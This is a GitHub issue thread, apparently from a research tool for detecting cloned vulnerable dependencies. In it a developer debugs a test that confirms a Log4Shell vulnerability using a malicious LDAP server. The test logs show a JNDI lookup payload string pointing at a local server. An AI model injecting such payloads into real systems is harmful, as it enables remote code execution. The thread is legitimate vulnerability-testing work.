Closed wtwhite closed 12 months ago
Running java -jar dodgy-ldap-server.jar
as root causes the test to succeed on the vulnerable artifact, as intended.
Next: See whether specifying a >1024 port number on both sides gets this working outside of root.
mvn clean test
now works as expected in my Linux VM, but hung at the following point (after successfully creating foo
and reporting test success) on piccolo
:
--snip--
[INFO] -------------------------------------------------------
[INFO] T E S T S
[INFO] -------------------------------------------------------
[INFO] Running ConfirmVulnerabilitiesTests
Sep 21, 2023 4:30:11 PM null
INFO: [21/Sep/2023:16:30:11 +1200] CONNECT conn=0 from="127.0.0.1:57124" to="127.0.0.1:9389"
Sep 21, 2023 4:30:11 PM null
INFO: [21/Sep/2023:16:30:11 +1200] BIND REQUEST conn=0 op=0 msgID=1 version=3 dn="" authType="SIMPLE"
Sep 21, 2023 4:30:11 PM null
INFO: [21/Sep/2023:16:30:11 +1200] BIND RESULT conn=0 op=0 msgID=1 resultCode=0 etime=1.042
Sep 21, 2023 4:30:11 PM null
INFO: [21/Sep/2023:16:30:11 +1200] SEARCH REQUEST conn=0 op=1 msgID=2 base="exe" scope=0 filter="(objectClass=*)" attrs="ALL"
Sep 21, 2023 4:30:11 PM null
INFO: [21/Sep/2023:16:30:11 +1200] SEARCH RESULT conn=0 op=1 msgID=2 resultCode=34 diagnosticMessage="Unable to perform the search because an error occurred while attempting to parse base DN 'exe': The provided string could not be decoded as a DN because no equal sign was found after the RDN attribute 'exe'." etime=5.901 entriesReturned=0
java.lang.NullPointerException
at Exploit$OperationInterceptor.sendExeResult(Exploit.java:75)
at Exploit$OperationInterceptor.processSearchResult(Exploit.java:62)
at com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptorRequestHandler.processSearchRequest(InMemoryOperationInterceptorRequestHandler.java:831)
at com.unboundid.ldap.listener.StartTLSRequestHandler.processSearchRequest(StartTLSRequestHandler.java:309)
at com.unboundid.ldap.listener.LDAPListenerClientConnection.run(LDAPListenerClientConnection.java:582)
16:30:11.009 [main] ERROR ConfirmVulnerabilitiesTests - ${jndi:ldap://127.0.0.1:9389/exe}
[INFO] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 6.498 s - in ConfirmVulnerabilitiesTests
I suspect running the exploit triggered an intrusion detection system on piccolo
. I have emailed ECS to let them know, and ask for an exemption. Leaving the issue closed for now.
See https://github.com/jensdietrich/shadedetector/issues/36#issuecomment-1728681909.
The upshot is that my run-script generator auto-senses
testSignalWhenVulnerable
to befailure
instead ofsuccess
, resulting in clones being missed.